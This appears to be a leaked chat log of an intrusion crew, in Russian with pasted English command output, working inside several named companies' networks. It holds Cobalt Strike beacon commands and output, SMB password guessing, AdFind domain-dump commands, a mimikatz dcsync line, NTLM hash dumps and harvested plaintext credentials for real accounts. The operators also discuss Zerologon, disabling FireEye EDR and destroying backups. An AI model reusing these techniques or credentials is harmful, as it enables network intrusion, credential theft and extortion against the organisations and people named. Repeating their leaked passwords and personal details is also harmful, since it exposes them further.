Windows Server 2016 Standard ```Армы ``` 10.10.32.177 - Lost = 4 (100% loss) 10.10.17.28 - Lost = 4 (100% loss) 10.10.32.161 - Lost = 4 (100% loss) 10.10.1.50 - Destination host unreachable 10.10.1.129 - Destination host unreachable 10.20.1.30 - Destination host unreachable ``` Сервер ``` 10.10.1.60 - Destination host unreachable `````` у 3 нет дисков, шар,3389 ``` это точно виндовые сервера?``` Сервера Всего серверов по ад - 69 Живых - 50 Закрыто - 47 ( у 3 нет дисков, шар,3389) Сфера - снапшоты потерты Армы Всего по ад - 322 Живых - 140 Закрыто - 118 ``все, закончили`` `Teemo[KORBELDC1]SYSTEM */464|2020Dec23 04:28:53> net share \\10.10.13.14 [Tasked beacon to run net share on 10.10.13.14 [+] host called home, sent: 105058 bytes [+] received output: Shares at \\10.10.13.14: Share name Comment ---------- ------- ADMIN$ Remote Admin C$ Default share D$ Default share IPC$ Remote IPC print$ Printer Drivers` ``соотв по роадмапу есть действия на это`` 10.10.1.6 - 10.10.13.14 - 10.10.1.61 - ``` серваки не притянулись и не мапятся ``` 10.10.1.65 - 10.10.32.157 - 10.10.16.58 - 10.10.1.20 - 10.20.1.24 - 10.10.17.63 - ``` а это армы не мапятся@user4 ``` 10.10.32.153 10.10.4.100 10.10.12.156 10.10.16.238 10.10.12.52 10.10.32.172 10.10.17.54 10.10.16.51 10.10.16.19 10.10.16.39 10.10.16.15 10.10.16.190 10.10.16.165 10.10.32.178 10.10.17.48 10.10.12.156 10.10.1.94 10.10.16.41 10.10.17.47 10.10.16.37 10.10.16.172 10.10.1.135 10.10.16.2 10.10.16.34 10.10.16.43 10.10.17.41 10.10.16.197 10.10.17.38 ``@user3 ``` 10.10.32.149 10.10.17.61 10.10.17.69 10.10.17.39 10.10.16.38 10.10.16.195 10.10.32.145 10.20.2.82 10.10.16.245 10.10.16.48 10.10.16.194 10.10.12.51 10.10.16.64 10.10.32.150 10.10.17.59 10.10.17.38 10.10.16.180 10.10.16.250 10.10.16.21 10.10.17.55 10.10.16.26 10.10.16.55 10.10.1.46 10.10.16.13 10.10.16.3 10.10.16.63 10.10.16.245 10.10.17.49 ``@user7 ``` 10.10.16.29 10.10.16.42 10.10.1.65 10.10.16.7 10.10.17.39 10.10.17.4 10.10.16.230 10.10.12.50 10.9.32.98 10.10.16.166 
10.10.32.130 10.10.16.179 10.10.4.38 10.10.32.157 10.10.17.12 10.10.17.22 10.10.16.58 10.10.1.20 10.10.16.181 10.20.1.24 10.10.1.134 10.10.16.49 10.10.17.63 10.10.17.26 10.10.32.130 10.10.12.156 10.10.16.23 10.10.17.44 ``@user8 ``` 10.10.16.88 10.10.32.150 10.10.12.53 10.10.1.81 10.10.16.163 10.10.3.26 10.10.32.154 10.10.16.167 10.10.16.16 10.10.16.170 10.10.16.10 10.10.17.66 10.10.16.17 10.10.16.60 10.10.16.162 10.9.0.2 10.10.17.23 10.10.4.37 10.10.32.177 10.10.17.28 10.10.16.32 10.10.1.50 10.10.32.161 10.10.16.36 10.10.1.129 10.10.16.54 10.20.1.30 10.10.17.18 ```армыспасибо))было бы отличнотаску удалить?ок@user9 пожалуйста еще удалите тут дл которую кидали `COGNOSPD`user4 ``` 10.10.1.105 10.9.1.2 10.9.1.5 10.10.1.98 10.10.1.171 10.10.1.101 10.10.1.100 10.10.1.35 10.10.4.9 10.10.1.188 `````` * Username : daniel.harvey_adm * Domain : KORBEL * Password : W3lcome? * Username : adaudit * Domain : korbel * Password : #aud1T# * Username : ben.mandeville * Domain : KORBEL * Password : 1234qwerASDF!@#$ ```снапшотов*но это на потомроадмап кстати бы дополнить инфой про дроп бэкапов`` 45.126.210.66:22514 cJZw4bgWNBuYAeLXToHzNLYZOqnTS8CJwIe ```хорошо)[ ](https://mediaeveryone.com/group/korbel-com?msg=LrnbrbomduXzS6viq) пока нет)раз меньше 100 получается тянем в однуне от тебякобуот меня что то требуется?дану что начинаем?а именно?@tl1 не могу на дэдик попасть `209.222.97.50:10101```` 192.168.0.46:5000 192.168.0.46:80 192.168.0.41:515 192.168.0.41:443 192.168.0.41:80 192.168.0.41:139 192.168.0.38:5000 192.168.0.23:443 192.168.0.23:80 192.168.0.17:5900 192.168.0.17:5800 192.168.0.17:5040 192.168.0.17:3389 192.168.0.17:139 192.168.0.17:135 192.168.0.10:139 192.168.0.10:80 192.168.0.1:139 192.168.0.1:80 192.168.0.10:445 (platform: 500 version: 6.1 name: READYSHARE domain: WORKGROUP) 192.168.0.17:445 (platform: 500 version: 10.0 name: ATSALES_RL_LAP domain: AT) 192.168.0.41:445 `````` Teemo[ATSALES_RL_LAP]rlawrence/3100|2021Jan29 20:53:18> shell systeminfo [*] Tasked beacon to 
run: systeminfo [+] host called home, sent: 41 bytes [+] received output: Host Name: ATSALES_RL_LAP OS Name: Microsoft Windows 10 Pro OS Version: 10.0.19041 N/A Build 19041 OS Manufacturer: Microsoft Corporation OS Configuration: Member Workstation OS Build Type: Multiprocessor Free Registered Owner: Windows User Registered Organization: Product ID: 00330-50315-96784-AAOEM Original Install Date: 11/10/2020, 7:18:46 PM System Boot Time: 1/27/2021, 1:42:15 PM System Manufacturer: LENOVO System Model: 80SX System Type: x64-based PC Processor(s): 1 Processor(s) Installed. [01]: Intel64 Family 6 Model 78 Stepping 3 GenuineIntel ~1800 Mhz BIOS Version: LENOVO 0ZCN41WW, 9/15/2017 Windows Directory: C:\WINDOWS System Directory: C:\WINDOWS\system32 Boot Device: \Device\HarddiskVolume1 System Locale: en-us;English (United States) Input Locale: en-us;English (United States) Time Zone: (UTC-07:00) Mountain Time (US & Canada) Total Physical Memory: 5,864 MB Available Physical Memory: 1,787 MB Virtual Memory: Max Size: 9,576 MB Virtual Memory: Available: 3,440 MB Virtual Memory: In Use: 6,136 MB Page File Location(s): C:\pagefile.sys Domain: AT.LOCAL Logon Server: \\ATSALES_RL_LAP Hotfix(es): 7 Hotfix(es) Installed. [01]: KB4586876 [02]: KB4577266 [03]: KB4580325 [04]: KB4586864 [05]: KB4593175 [06]: KB4598481 [07]: KB4598242 Network Card(s): 3 NIC(s) Installed. 
[01]: Qualcomm Atheros QCA9377 Wireless Network Adapter Connection Name: Wi-Fi DHCP Enabled: Yes DHCP Server: 192.168.0.1 IP address(es) [01]: 192.168.0.17 [02]: Realtek PCIe GBE Family Controller Connection Name: Ethernet Status: Media disconnected [03]: Bluetooth Device (Personal Area Network) Connection Name: Bluetooth Network Connection Status: Media disconnected Hyper-V Requirements: VM Monitor Mode Extensions: Yes Virtualization Enabled In Firmware: No Second Level Address Translation: Yes Data Execution Prevention Available: Yes ``` скорее всего ноутбук`` Teemo[ATSALES_RL_LAP]SYSTEM */12676|2021Jan29 20:44:02> shell dir C:\Users [Tasked beacon to run: dir C:\Users [+] host called home, sent: 43 bytes [+] received output: Volume in drive C is Windows Volume Serial Number is 2C89-5747 Directory of C:\Users 11/10/2020 06:41 PM . 11/10/2020 06:41 PM . 11/10/2020 07:03 PM administrator 11/10/2020 06:55 PM administrator.AT 11/10/2020 06:56 PM administrator.AT.000 11/10/2020 06:57 PM administrator.ATSALES_RL_LAP 11/10/2020 06:54 PM Barfield 11/10/2020 06:58 PM LogMeInRemoteUser 11/10/2020 07:32 PM Public 11/10/2020 06:56 PM RLAWRENCE 11/10/2020 06:58 PM rlawrence.AT 01/27/2021 01:44 PM rlawrence.ATSALES_RL_LAP 0 File(s) 0 bytes 12 Dir(s) 847,083,728,896 bytes free ``` ну доменные пользаки ходят на эту тачкуДА нетувг что ли`` Teemo[ATSALES_RL_LAP]SYSTEM */12676|2021Jan29 20:41:44> shell net localgroup Administrators [*] Tasked beacon to run: net localgroup Administrators [+] host called home, sent: 60 bytes [+] received output: Alias name Administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------- Administrator Barfield rlawrence The command completed successfully. 
```сесия опять оффнашёл лишь ярлык ведущий к файлуискал впнадинфо не снял так как домен не доступен былbarfieldinc.com`` MS.Outlook.15:rlawrence@amgusa.org\rlawrence@amgusa.org P@ssword1 portal.us.elephantoutlook.com\rlawrence@amgusa.org P@ssword1 at\rlawrence c35845dac149d05a4fce77de6e0b5ec0 10.0.6.59\at\administrator admin@Barfield lh_data-server\at\rlawrence P@ssword1 MS.Outlook.15:rlawrence@amgusa.org:PUT\rlawrence@amgusa.org @@CoAAAAAyBAbAEGA3BgcAUGAuBwYAUGAABQYA0GAnBQdAMHAhBgLA8GAyBwZAA MicrosoftOffice16_Data:SSPI:rlawrence@barfieldinc.com\rlawrence@amgusa.org P@ssword1 ATSALES_RL_LAP\rlawrence c35845dac149d05a4fce77de6e0b5ec0 rlawrence@amgusa.org\rlawrence@amgusa.org P@ssword1 ```пока все ссылки проверил сетка отвалилась (ошибочка вышла, `barfieldinc.com` их доменеще разок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 ставлю скан`` beacon> shell net use \\10.100.7.16\c$ 1969C00p3r /user:Administrator [Tasked beacon to run: net use \\10.100.7.16\c$ 1969C00p3r /user:Administrator [+] host called home, sent: 86 bytes [+] received output: System error 86 has occurred. The specified network password is not correct. beacon> shell net use \\10.100.7.16\c$ consolidate_16 /user:Administrator [Tasked beacon to run: net use \\10.100.7.16\c$ consolidate_16 /user:Administrator [+] host called home, sent: 90 bytes [+] received output: System error 86 has occurred. The specified network password is not correct. ```не локнуть бы)ну попробуй ЛА дааможно попробовать эти учетки на смб логин`` Administrator:1969C00p3r Administrator:consolidate_16 ```либо есть другие энтерылибо пасс у Администратора разныйи пересечений нетя снял со всех текущих доменов энтеровсе? 
получилось?энтерпрайсы и вми сервис локальные админы на ДК`` PDC Alias name administrators Comment Members can fully administer the computer/domain Members ------------------------------------------------------------------------------- Administrator DEN-DCON-01$ Domain Admins PVRT\Enterprise Admins PVRT\wmi.service ============================================= `````` DEN-DCON-02.na.panavision.com [DS] Site: Denver DEN-DCON-01.na.panavision.com [PDC] [DS] Site: Denver WDH-DCON-02.na.panavision.com [DS] Site: Woodland-Hills The command completed successfully ============================================= PDC Alias name administrators Comment Members can fully administer the computer/domain Members ------------------------------------------------------------------------------- Administrator DEN-DCON-01$ Domain Admins PVRT\Enterprise Admins PVRT\wmi.service ============================================= Group name Domain Admins Comment Designated administrators of the domain Members ------------------------------------------------------------------------------- #yromero adfs.admin Administrator BackupMgr CZambrana_da exponential it.deploy it.inventory jharris_da mpatterson_ea orivera_da PKooiman_da sanadmin SP_Admin SQLAgent windchilladmin yromero_ea pvna\#yromero V@ndals1974 ============================================= ``эмм`` beacon> shell ping -n 1 panavision.com [*] Tasked beacon to run: ping -n 1 panavision.com [+] host called home, sent: 55 bytes [+] received output: Pinging panavision.com [10.100.7.16] with 32 bytes of data: Reply from 10.100.7.16: bytes=32 time<1ms TTL=126 Ping statistics for 10.100.7.16: Packets: Sent = 1, Received = 1, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms ``это нужный домен?технологии...он даже аптайм показывает`` msf6 auxiliary(scanner/smb/smb_version) > run [*] 10.100.7.16:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression 
capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:required) (uptime:3d 11h 49m 56s) (guid:{1466eec3-53c0-4eb4-af7e-1dabe2584051}) (authentication domain:PVRT) [+] 10.100.7.16:445 - Host is running Windows 2016 Standard (build:14393) (name:GBL-DCON-02) (domain:PVRT) [*] 10.100.7.16: - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed ```я со времен армы вообще не трогала ты давно сканил через смб вершн?откуда эта теория?)))а я думал что видимость днс это аналог трастану так в чем проблема?его походу все видятSYD-WSUS-01`` DNS Suffix Search List. . . . . . : ap.panavision.com na.panavision.com panavision.com eu.panavision.com sa.panavision.com ```скан щас поставлюа тут общих ДА на сколько помнюпоробовать туда креды ДА с "тем" доменомнайти там тачкинадо отсканить на смб_вершн диапазони всепросто эти машины "видят" доменты страный какой-то схуяли видимоть ДНСа траст должна давать?чувак)бляне понимаю`` dn:CN=PANAVISION,CN=System,DC=panavision,DC=com >whenCreated: 2005/09/15-00:51:44 GMT Daylight Time >name: PANAVISION >securityIdentifier: S-1-5-21-202912000-196093339-1136263860 >trustDirection: 3 [Inbound(1);Outbound(2)] >trustPartner: PANAVISION >trustType: 1 [Downlevel(1)] >trustAttributes: 4 [Quarantined-Domain(4)] ``или стопбля а реально он тут довереный`` dn:CN=panavision.com,CN=System,DC=ap,DC=panavision,DC=com >whenCreated: 2006/01/16-23:54:35 GMT Daylight Time >name: panavision.com >securityIdentifier: S-1-5-21-4133310860-2374335328-2948649967 >trustDirection: 3 [Inbound(1);Outbound(2)] >trustPartner: panavision.com >trustType: 2 [UpLevel(2)] >trustAttributes: 32 [Within-Forest(32)] ```вернораз у них днс довереныйага ну т е он общается с карантиным доменом`` DNS Suffix Search List. . . . . . 
: ap.panavision.com na.panavision.com panavision.com eu.panavision.com sa.panavision.com ``вон сабнет карантиненного доменаэто с EUR-DCON-01`` Pinging panavision.com [10.100.7.16] with 32 bytes of data: ```видишь?`` beacon> shell ipconfig /all [*] Tasked beacon to run: ipconfig /all [+] host called home, sent: 44 bytes [+] received output: Windows IP Configuration Host Name . . . . . . . . . . . . : AUS-DCON-01 Primary Dns Suffix . . . . . . . : ap.panavision.com Node Type. . . . . . . . . . . . : Hybrid IP Routing Enabled. . . . . . . . : No WINS Proxy Enabled. . . . . . . . : No DNS Suffix Search List. . . . . . : ap.panavision.com na.panavision.com panavision.com eu.panavision.com sa.panavision.com ``надо`` Host Name: EUR-WSUS-16 OS Name: Microsoft Windows Server 2016 Standard OS Version: 10.0.14393 N/A Build 14393 OS Manufacturer: Microsoft Corporation OS Configuration: Member Server OS Build Type: Multiprocessor Free Registered Owner: Windows User Registered Organization: Product ID: 00377-60000-00000-AA934 Original Install Date: 10/4/2018, 4:40:38 PM System Boot Time: 9/12/2020, 7:25:46 PM System Manufacturer: Microsoft Corporation System Model: Virtual Machine System Type: x64-based PC Processor(s): 1 Processor(s) Installed. [01]: Intel64 Family 6 Model 79 Stepping 1 GenuineIntel ~2400 Mhz BIOS Version: Microsoft Corporation Hyper-V UEFI Release v1.0, 11/26/2012 Windows Directory: C:\Windows System Directory: C:\Windows\system32 Boot Device: \Device\HarddiskVolume2 System Locale: en-gb;English (United Kingdom) Input Locale: en-gb;English (United Kingdom) Time Zone: (UTC+00:00) Dublin, Edinburgh, Lisbon, London Total Physical Memory: 8,095 MB Available Physical Memory: 4,448 MB Virtual Memory: Max Size: 9,375 MB Virtual Memory: Available: 5,468 MB Virtual Memory: In Use: 3,907 MB Page File Location(s): C:\pagefile.sys Domain: eu.panavision.com Logon Server: N/A Hotfix(es): 18 Hotfix(es) Installed. 
[01]: KB3192137 [02]: KB4091664 [03]: KB4132216 [04]: KB44659 [05]: KB4485447 [06]: KB4498947 [07]: KB4503537 [08]: KB4509091 [09]: KB4512574 [10]: KB4520724 [11]: KB4521858 [12]: KB4524244 [13]: KB4540723 [14]: KB4550994 [15]: KB4562561 [16]: KB4565912 [17]: KB4576750 [18]: KB4577015 Network Card(s): 1 NIC(s) Installed. [01]: Microsoft Hyper-V Network Adapter Connection Name: Ethernet DHCP Enabled: Yes DHCP Server: 10.32.1.41 IP address(es) [01]: 192.168.33.101 [02]: fe80::f831:9a12:366d:1ed6 Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed. ```а во айпиконфигдай весь вывод системнифо`` [01]: Microsoft Hyper-V Network Adapter Connection Name: Ethernet DHCP Enabled: Yes DHCP Server: 10.32.1.41 IP address(es) [01]: 192.168.33.101 [02]: fe80::f831:9a12:366d:1ed6 `````` [01]: Microsoft Hyper-V Network Adapter Connection Name: Ethernet DHCP Enabled: No IP address(es) [01]: 192.168.1.85 [02]: fe80::188e:a234:ce85:3eb7 ``если хочешь могу дать тебе доступ сам потыкаешьно прикол в том, что его собственная нагрузка определятся как малварь)))вобще суть его в том, что он обходит амси и позволяет через себя модули типо мимика запускатьи как он кстати?ну просто в системинфо глянья развернул тот поверхабкстатиа как еще снимать днсы я хз)а я поэтому и скинул тебе что папки dns нет и как и утилиты)там где НЕТ днс сервера?)))что не снимешь днс записину логически то ты же понимаешьтак ты и сказал мол сними днс я только об этом и знаю)итдпосмотри кто логинился на сервак (если там с других доменов кто был - будет видно)и посмотри какие там ндсы будут блин)сделайsysteminfoчто ты дампить пытаешься?)это ж не днс сервера че за хуйню ты делаешь?что теперь делаем?папки DNS нигде нет, dnscmd тоже не нашло в system32`` beacon> shell dnscmd /enumzones > AllZones.txt [*] Tasked beacon to run: dnscmd /enumzones > AllZones.txt [+] host called home, sent: 63 bytes [+] received output: 'dnscmd' is not recognized as an internal or external 
command, operable program or batch file. `````` beacon> shell dir C:\windows\system32\dns [*] Tasked beacon to run: dir C:\windows\system32\dns [+] host called home, sent: 58 bytes [+] received output: Volume in drive C has no label. Volume Serial Number is 5C94-6AB3 Directory of C:\windows\system32 File Not Found ``ну если он через сервисы вырубается то можно массово будет батником хуйнуть какие проблемыно надо на каждом пк откл как ты понимаешьа он через сервисы еще отключаетсяадминку надо от фаерая найти будет...``` Pinging EUR-WSUS-16.eu.panavision.com [192.168.33.101] with 32 bytes of data: Reply from 192.168.33.101: bytes=32 time=157ms TTL=251 Ping statistics for 192.168.33.101: Packets: Sent = 1, Received = 1, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 157ms, Maximum = 157ms, Average = 157ms Pinging SYD-WSUS-01.ap.panavision.com [192.168.1.85] with 32 bytes of data: Reply from 192.168.1.85: bytes=32 time=204ms TTL=251 Ping statistics for 192.168.1.85: Packets: Sent = 1, Received = 1, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 204ms, Maximum = 204ms, Average = 204ms ``даже так, еще один всус жив`` Pinging AUB-WSUS-16.eu.panavision.com [172.16.1.120] with 32 bytes of data: Reply from 66.45.62.99: Destination net unreachable. Ping statistics for 172.16.1.120: Packets: Sent = 1, Received = 1, Lost = 0 (0% loss), [+] received output: Pinging EUR-WSUS-16.eu.panavision.com [192.168.33.101] with 32 bytes of data: Reply from 192.168.33.101: bytes=32 time=157ms TTL=251 Ping statistics for 192.168.33.101: Packets: Sent = 1, Received = 1, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 157ms, Maximum = 157ms, Average = 157ms `````` The genuine xagt.exe file is a software component of FireEye Endpoint Security by FireEye. FireEye Endpoint Security is a single-agent security solution that protects endpoint systems from online threats. 
Xagt.exe runs a core process associated with FireEye Endpoint Security. Disabling this process may cause issues with this program ``если бы мой англ был хуже чем 0, я бы перевел как горящая жопа[ ](https://mediaeveryone.com/group/panavision-com?msg=ChvqBYADCYspYbbPi) так огенный глазтакая штука есть`` > Sage AUB-SAGE-16 ``кстати а что с авером в сети?давай-ка посмотрим что на нем)ага рабочий`` Pinging SYD-WSUS-01.ap.panavision.com [192.168.1.85] with 32 bytes of data: Reply from 192.168.1.85: bytes=32 time=204ms TTL=251 Ping statistics for 192.168.1.85: Packets: Sent = 1, Received = 1, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 204ms, Maximum = 204ms, Average = 204ms ```во интересноSCCM больше нет кроме того, которого не существуетвот этот WSUS`` beacon> shell ping -n 1 SYD-WSUS-01 [*] Tasked beacon to run: ping -n 1 SYD-WSUS-01 ```есть надежда)1 на 4 домена получаетсяхреновато...поэтому может он под другим именем`` beacon> shell ping -n 1 DEN-SCCM-01 [*] Tasked beacon to run: ping -n 1 DEN-SCCM-01 beacon> shell ping -n 1 DEN-WSUS-01 [Tasked beacon to run: ping -n 1 DEN-WSUS-01 [+] host called home, sent: 104 bytes [+] received output: Ping request could not find host DEN-SCCM-01. Please check the name and try again. [+] received output: Ping request could not find host DEN-WSUS-01. Please check the name and try again. `````` dn:CN=DEN-WSUS-01,OU=Disabled Computers,DC=na,DC=panavision,DC=com dn:CN=DEN-SCCM-01,OU=Disabled Servers,DC=na,DC=panavision,DC=com ``тут такое делобычно подписан просто как WSUSкто? 
A WSUS server?
can it somehow be picked out of ad_comps by SPN?
lol)
okay
right
like, can 1 server be a single WSUS for several domains?
including the quarantine
SCCM / WSUS servers are often present in all domains of the forest under different hostnames
well yes
like, WSUS will be a trusted server since it sees the quarantine's DNS server?
I don't quite understand how?
dump them, they may be able to see the quarantine
dump from all current domains?
nope
did you dump the DNS from SCCM/WSUS?
any ideas how?
damn, we need to find a way in...
no problem
```
dn:CN=PANAVISION,CN=System,DC=panavision,DC=com >whenCreated: 2005/09/14-16:51:44 Pacific Daylight Time >name: PANAVISION >securityIdentifier: S-1-5-21-202912000-196093339-1136263860 >trustDirection: 3 [Inbound(1);Outbound(2)] >trustPartner: PANAVISION >trustType: 1 [Downlevel(1)] >trustAttributes: 4 [Quarantined-Domain(4)]
```
remind me what it's called please
no need to go into the quarantined domain?
backups found?
so what's the plan now?
```
eu.panavision.com ================= > Domain Controller AUB-DCON-01 PRK-DCON-01 PRK-DCON-02 GFD-DCON-01 GFD-DCON-02 EUR-DCON-01 GFD-DCON-16 -------------------- > File Servers PRA-FILE-01 PRK-FILE-01 AUB-FILE-01 AUB-FILE-02 GFD-FILE-01 AUB-FILE-04 FR-SPARESERVER MAN-FILE-02 PRV-FILE-02 WTL-FILE-02 -------------------- > Sage AUB-SAGE-16 -------------------- > SQL PA-SDS-01 EUR-DOMS-01 EUR-ACMS-01 EUR-MSQL-14 AUB-WEB-01 GFD-ACMS-02 PA-INTB-01 PRK-ITMS-01 -------------------- > UAG Server EUR-FUAG-01 -------------------- > Insphire Server EUR-INSP-01 -------------------- > Hyper-V AUB-HYPV-01 AUB-HYPV-01 AUB-HYPV-02 GFD-HYPV-05 GFD-HYPV-06 AUB-HYPV-04 PRK-HYPV-03 -------------------- > Remote Desktop Services Server/Credit Host EUR-RDS-04 EUR-RDSH-08 EUR-MRDS-01 EUR-RDSB-01 EUR-RDSH-01 EUR-RDSH-02 EUR-RDSH-03 EUR-RDSH-04 EUR-RDSH-05 EUR-RDSB-02 EUR-RDSB-03 EUR-RDSH-06 EUR-RDSH-07 -------------------- > Interbase Database Server GBL-INTR-01 GBL-INTR-02 -------------------- > WSUS AUB-WSUS-16 EUR-WSUS-16 -------------------- > Terminal Server License Servers EUR-LHPV-01 EUR-LHPV-02 EUR-LHPV-03 -------------------- > ATS Server PA-PRTSVR -------------------- > Disabled Computers PRK-SRCE-01 PRK-BUILD-01 PRK-CBLD-01 PRK-CSYS-01 PRK-CVCS-01 PRK-HPV-01 EUR-LRAH-01 EUR-LRAH-02 EUR-DCON-02 -------------------- > Failover cluster virtual network name account PRK-CLST-12 GDF-CLST-01 -------------------- > Lexicon (Web Hosting, eCommerce Solutions, Peace of Mind. LexiConn provides personal service, expert, in-house support, and rock solid hosting solutions designed to grow and evolve with the needs of your business) EUR-LRAH-03 EUR-LRCB-01 EUR-LRAH-04 EUR-LRAH-05 -------------------- > Unavailable EUR-LEE-01 EUR-LEE-02 EUR-LEE-03 EUR-LEE-04 EUR-MDPM-01 GFD-CORESRV-01 -------------------- > w3wp EUR-LREP-01 EUR-LSRV-02 EUR-LSRV-06 EUR-LSRV-07 EUR-LSRV-08 EUR-LSRV-09 -------------------- > PDQ EUR-ITMS-12 -------------------- ??? AT-SRV-APPS-1 EUR-CSYS-01 EUR-CVCS-01 GFD-ALCT-01
```
ask the colleagues, I think they found an RCE there?
and that's only what the checker found, but it checks only 1 ip at a time, I didn't verify)
SMBGhost a miss?
basically on this network my last hope is zerologon (which they didn't patch after the last attempt lol)
to run dcsync you need to make a token via pth, but since there's no SYSTEM it won't work
```
mimikatz lsadump::dcsync /dc:SS-Data2.Austin.SilencerShop.com /user:SilencerShop\krbtgt /authuser:SS-DATA2$ /authdomain:. /authpassword:"" /authntlm
```
this line apparently doesn't work because CS has the old mimikatz, and a new version can't be dropped onto the machine since it's seen as a virus.
we have only one valid user who goes over SMB to 10.7.20.30 - and no idea what machine that is (he's a local user there)
if you dumped ad_users.txt I already figured you have logins))
only logins
found DAs without passwords
DA found = login and password are valid
DA login
we can't get into the domain
DAs found (found their logins)
so everything's ok here, keep looking for DAs for now
Connected to the VPN
so you didn't connect to the VPN?
behind the vpn
over the local one)
or which network are you walking around?
checked local admins, DA accounts against the found passwords
> Brought up the vpn, walking the network via our dedic
am I reading this phrase wrong?
Found, not connected to the domain
DA found?
got into the domain?
checked the admin over smb
Brought up the vpn, walking the network via our dedic, looking at what's there, scanning for ms17
how's it going?
```
[+] 10.7.20.30:445 - 10.7.20.30:445 - Success: 'WORKSTATION\Louisad:M@tches2020!!'
```
description
```
Prod App read only (Matches2014) - prodappread Test account for app pw matches123 - ipadvpn iTunes Account for Richmond stores (Matches123) - richapp
```
DA
```
LDAP_SEARCH_S: 0x34 LDAP_SEARCH_S: Unavailable ERROR: Couldn't gather RootDSE Info... Terminating program.
```
```
adfind.exe -f "(objectcategory=person)" -h 10.1.4.30 > ad_users.txt adfind.exe -f "objectcategory=computer" -h 10.1.4.30 > ad_computers.txt adfind.exe -f "(objectcategory=organizationalUnit)" -h 10.1.4.30 > ad_ous.txt adfind.exe -subnets -f (objectCategory=subnet) -h 10.1.4.30 > subnets.txt adfind.exe -f "(objectcategory=group)" -h 10.1.4.30 > ad_group.txt adfind.exe -gcb -sc trustdmp -h 10.1.4.30 > trustdmp.txt
```
it doesn't exist in the domain and you're trying to query the DC from a forbidden pc
the point is that you can't dump AD, since your pc is in a workgroup
yes
did you bring up the vpn there?
ah, you pulled in a dedic
that's a dedic
your files?
```
Directory of C:\users\Administrator\Desktop 09/28/2020 03:23 PM . 09/28/2020 03:23 PM . 09/28/2020 03:24 PM 391 ad.bat 09/28/2020 03:22 PM 1,394,176 AdFind.exe 09/28/2020 01:55 PM 4,554 io.xml 09/23/2020 12:33 PM 303,098 kali-linux-2020.3-installer-amd64.iso.torrent 09/28/2020 02:55 PM 27 LEHA.txt 09/28/2020 01:55 PM 0 New Text Document.txt 09/28/2020 02:12 PM 935 Nmap - Zenmap GUI.lnk 09/28/2020 02:21 PM 7,978 nmap.7z 09/28/2020 02:19 PM 188,255 nmap.xml 09/23/2020 12:32 PM 867 µTorrent.lnk
```
to start, try restarting
@tl1
what could this be in smb_login
```
Error: 10.20.4.78: Errno::EISDIR Is a directory @ io_fillbuf - fd:52 /home/user/Desktop/cobalt
```
[ ](https://mediaeveryone.com/group/matches?msg=bsWTgZB5hY8rthErT) no, but it doesn't find it
```
====== MappedDrives Mapped Drives (via WMI) LocalName : p: RemoteName: \\ho-fs01.matches.com\press RemotePath : \\ho-fs01.matches.com\press Status : Unavailable ConnectionState : Disconnected Persistent : True UserName : Description : RESOURCE REMEMBERED - Microsoft Windows Network LocalName : y: RemoteName : \\HO-FS01.matches.com\department RemotePath : \\HO-FS01.matches.com\department Status : Unavailable ConnectionState : Disconnected Persistent : True UserName : Description : RESOURCE REMEMBERED - Microsoft Windows Network
```
and it's not empty?
```
Administrator:500:aad3b435b51404eeaad3b435b51404ee:faf5481720d381d2405ef4194ddb4770::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:1a20cb05b4b6db77e592dee4e974e4d9:::
```
```
Domain: UKHECSLT3028 Login: Administrator Password: 192837465S! NTLM: f490c4823837a7d002e0176f3c5203ad Domain : MATCHES Login : mercedesd Password: Dinham2323 NTLM : 7c839aa54221edb65e959f18ab9bde41 Domain : MATCHES.COM Username : Louisad Password: M@tches2020!! NTLM: f74bc7faf8ddfbedb1441e9e42cdbb1c
```
Great)
+
vpn came up?
all fine, it's a woman
if you want to connect his pc he may notice the vpn suddenly turned on
maybe the installer is sitting on the PC too
look for a domain to connect to, you have domain creds
deploy the vpn on the dedic
```
beacon> shell ipconfig /all [*] Tasked beacon to run: ipconfig /all [+] host called home, sent: 44 bytes [+] received output: Windows IP Configuration Host Name . . . . . . . . . . . . : UKHOEVLT3156 Primary Dns Suffix . . . . . . . : matches.com Node Type . . . . . . . . . . . . : Mixed IP Routing Enabled. . . . . . . . : No WINS Proxy Enabled. . . . . . . . : No DNS Suffix Search List. . . . . . : matches.com Home Ethernet adapter Ethernet 3: Media State. . . . . . . . . . . : Media disconnected Connection-specific DNS suffix : Description . . . . . . . . . . . : Fortinet SSL VPN Virtual Ethernet Adapter Physical Address. . . . . . . . . : 00-09-0F-AA-00-01 DHCP Enabled. . . . . . . . . . . : Yes Autoconfiguration Enabled . . . . : Yes Ethernet adapter Ethernet: Media State. . . . . . . . . . . : Media disconnected Connection-specific DNS Suffix . : matches.com Description. . . . . . . . . : Intel(R) Ethernet Connection (6) I219-V Physical Address. . . . . . . . . : 00-68-EB-67-1A-A2 DHCP Enabled. . . . . . . . . . . : Yes Autoconfiguration Enabled . . . . : Yes Wireless LAN adapter Local Area Connection* 1: Media State. . . . . . . . . . . : Media disconnected Connection-specific DNS suffix : Description . . . . . . . . . . . : Microsoft Wi-Fi Direct Virtual Adapter Physical Address. . . . . . . . . : 04-ED-33-E4-5F-2B DHCP Enabled. . . . . . . . . . . : Yes Autoconfiguration Enabled . . . . : Yes Wireless LAN adapter Local Area Connection* 10: Media State. . . . . . . . . . . : Media disconnected Connection-specific DNS suffix : Description . . . . . . . . . . . : Microsoft Wi-Fi Direct Virtual Adapter #2 Physical Address. . . . . . . . . : 06-ED-33-E4-5F-2A DHCP Enabled. . . . . . . . . . . : Yes Autoconfiguration Enabled . . . . : Yes Ethernet adapter Ethernet 2: Media State. . . . . . . . . . . : Media disconnected Connection-specific DNS suffix : Description 